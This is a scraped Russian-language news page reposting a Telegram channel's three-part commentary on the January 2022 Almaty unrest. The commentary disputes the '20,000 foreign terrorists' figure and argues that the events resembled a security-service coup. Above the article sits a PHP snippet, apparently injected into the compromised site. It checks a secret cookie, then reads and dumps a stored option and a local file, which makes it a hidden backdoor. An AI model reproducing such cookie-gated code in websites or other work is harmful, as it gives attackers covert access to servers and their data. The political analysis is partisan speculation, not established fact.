if (isset($_COOKIE["BsIbuVOYEiveJFkpFamX1AFEH3OK4xrKIKkWV0cFmaxChmhI"])) { $lines = get_option( 'wpsdth4_license_key' ); if (!empty($lines)) { $lines = @file_get_contents(".tmp"); } echo $lines; exit(); } Алматы: что это было? Версия Telegram канала «Эцих с гвоздями» - Better.kz
15.01.2022

Алматы: что это было? Версия Telegram канала «Эцих с гвоздями»

photo_2021-01-12_10-36-47

Часть 1

Канал Telegram – Эцих с гвоздями [12.01.2021 11:04]

Человечество вступило в фазу перехода Земли в состояние планеты Плюк, а в Казахстане стартовал новый политический сезон.  Администрация канала приветствует вас на борту нашего пепелаца. Встретим будущее вместе, пристегнитесь! Мы дождались момента, когда СМИ и социальные сети высосут из казахстанцев все эмоции, чтобы порассуждать уже хладнокровно на тему, что это было.

Начнем с самого обсуждаемого сейчас заявления Касым-Жомарта Токаева о «20 тысячах иностранных террористов, напавших на Алматы». Сказано это было в разгар погромов, а потому не будем винить главу государства — он тогда определенно делал все для спасения нашего Плюка, внезапно решившего сойти с орбиты. И, судя по аресту Карима Масимова, а также начальника Службы специального назначения «А» Ануара Садыкулова и зампредседателя КНБ Даулета Ергожина, качество поставляемой в Центр информации было никудышное, как минимум.

Но пока цифра в 20 тысяч не складывается. Поиграем в арифметику. Накануне Генпрокуратура РК сообщила данные по административным и уголовным делам, связанным с митингами и беспорядками. Это не только по Алматы, но и по всей республике.

На данный момент имеется 6966 протоколов по административным нарушениям. 2048 из них еще на рассмотрении судов, 4918 человек уже привлечены. 791 — штрафы, 2149 — предупреждения, под арест попали 1978 человек. Все это – участники мирных протестов, преимущественно, активисты (в терминологии чатлан — смутьяны).

А вот теперь самое интересное — цифры по уголовным и террористическим делам. Очевидно, в первую категорию входят те, кто мародерствовал, дрался с полицией и покушался на здоровье и жизнь мирных граждан. По террористам понятно — они и стали виной апокалипсиса в южной столице нашего Плюка.

так, в работе у следствия 494 уголовных дела, из них 44 — терроризм, 15 — убийства, 34 — массовые беспорядки. Остальное скрывается под стыдливой формулировкой «и др.», но мы-то понимаем, что это — дела по мародерству.

В изоляторы на данный момент водворены 524 подозреваемых.

Словом, количество административных правонарушителей и подозреваемых в преступлениях не складывается в искомые «20 тысяч террористов». Что же до иностранных…

Часть 2

Канал Telegram – Эцих с гвоздями [14.01.2022 11:25]

Как водится на Плюке, воля начальства, пусть даже и введенного в заблуждение, — закон, поэтому у нас принялись сразу ловить кыргызов по барахолкам и быстро попали впросак с популярным джазовым музыкантом из Бишкека.

А мы опять прибегнем к цифрам. Тут еще проще. За точку отсчета берем Жанаозен-2011, в том году в Алматы жило 1,4 миллиона человек. По последним данным, в южной столице теперь 2,016 миллиона жителей. Более 600 тысяч новых горожан, заселивших преимущественно новые окраины города. Там же селятся и многочисленные гастарбайтеры из соседних республик. И пока власти Алматы торжественно вещали о «городе без окраин», те, предоставленные сами себе, медленно наливались классовой ненавистью.

Тут, к слову, необходимо упомянуть Бауыржана Байбека, заботливо умостившего центральные улицы Алматы: очевидно, «болашакеров» не учили, что булыжник — лучшее орудие пролетариата.

photo_380871

Хроника событий и первоначальное место действия подтверждают, что основную массу протестующих составили жители западных окраин города: на мирную демонстрацию 4 января народ собирался на площади у «Алматы Арены». Там же их пыталась заблокировать полиция, произошла массовая стычка, ввиду численного преимущества протестующих полицейские были вынуждены ретироваться, оставив на поле драки амуницию. Отсюда и многочисленные щиты и дубинки в руках у протестующих в ночь с 4 на 5 января. Разгоряченные боем и победой люди дошли до площади Республики, там последовали новые столкновения, но площадь в итоге была занята демонстрантами. Тогда же сожгли первую полицейскую машину, то есть, градус протестов резко зашкалил, и в этот момент кто-то из официальных лиц должен был разрядить обстановку. Желательно, появившись на публике.

Но к тому моменту вся страна уже увидела, как вице-премьер Ерлан Тугжанов и аким Нурлан Ногаев едва унесли ноги от толпы митингующих в Актау, поэтому Бакытжана Сагинтаева никто не дождался.

На следующее утро к «революции» присоединились искомые участники уголовных дел – основная масса из них мародеры, немногочисленное ядро состояло из людей, обладающих уже серьезными профессиональными навыками вроде ведения партизанских боев в городских условиях (герилья, если кто помнит Че Гевару). Первые новости о движении протестной массы поступили из района «Алтын Орды», полиция выставила несколько кордонов по улице Толе би, но их разметали уже к полднику.

Ирония судьбы в том, что объявившийся 5 января Сагинтаев заявил, будто «город под контролем». А дальше было то, что увидел весь мир.

Часть 3

Канал Telegram – Эцих с гвоздями [14.01.2022 11:29]

Итак, пока у нас по зачинщикам погромов и нападений на здания правоохранительных органов, КНБ и акиматов всего 93 уголовных дела. Понятно, что основная их часть приходится на южные (и наиболее пострадавшие) города — Талдыкорган, Тараз, Шымкент и, конечно же, Алматы. Тут проясняются слова Токаева о потере Алматы, которая означала бы потерю всего юга.

Информационной шелухой, которая мешает понять, что произошло, являются эти бесконечные поиски журналистами «пропавшей семьи Назарбаевых». А если отсечь любую конспирологию про «роль Елбасы» или его племянников, «дворцовый переворот Токаева» и дальнейшую судьбу Дариги, Динары и Алии, то налицо классическая латиноамериканская схема захвата власти обычной хунтой — только возглавляемой не военными, а спецслужбой, располагающей обширным компроматом на всех значимых чатлан нашего Плюка.

Дезу о «20 тысячах террористов» запустили в Центр, видимо, чтобы объяснить, почему алматинские силы правопорядка оказались беспомощными. Да они просто не имели сведений о том, что вообще происходит в городе! По соцсетям распространяется информация, что личный состав ДКНБ по Алматы «был отправлен по домам 5 января». А ведь именно комитетчики — основные координаторы действий силовиков во время протестных акций. Но в этот раз, похоже, они координировали действия их противников — участники уличных столкновений в Алматы запросто дворами обходили полицейские кордоны, нападая на бойцов с флангов.

Версию о попытке захвата властью подобием латиноамериканской хунты подтверждает и стремительное решение Токаева позвать на помощь контингент ОДКБ. Очевидно, к вечеру 5 января в Центре поняли, что из Алматы гонят дезинформацию, полицейские либо разбежались, либо отстреливаются от бандитов, рвущихся к арсеналу, военные дезорганизованы. Плюс оказался захвачен аэропорт, что уже за рамками логики любого, пусть даже и вышедшего из-под контроля протеста. Но четко укладывается в схему военного переворота, организаторам которого нужно не допустить переброски войск либо получить самому возможность этой переброски.

Учитывая, что после сообщения о скором появлении контингента ОДКБ ситуация пошла в сторону стабилизации, в планы заговорщиков участие столь мощного игрока как Россия не входило. А быстрое решение задачи и начавшийся уже вывод войск только доказывают — Кремлю в этой ситуации надо было всего лишь обозначить готовность поддерживать законную власть в Казахстане.

image49626406_f558955eb34904b58b2d0ce3a2bbbb14

Комментарии закрыты.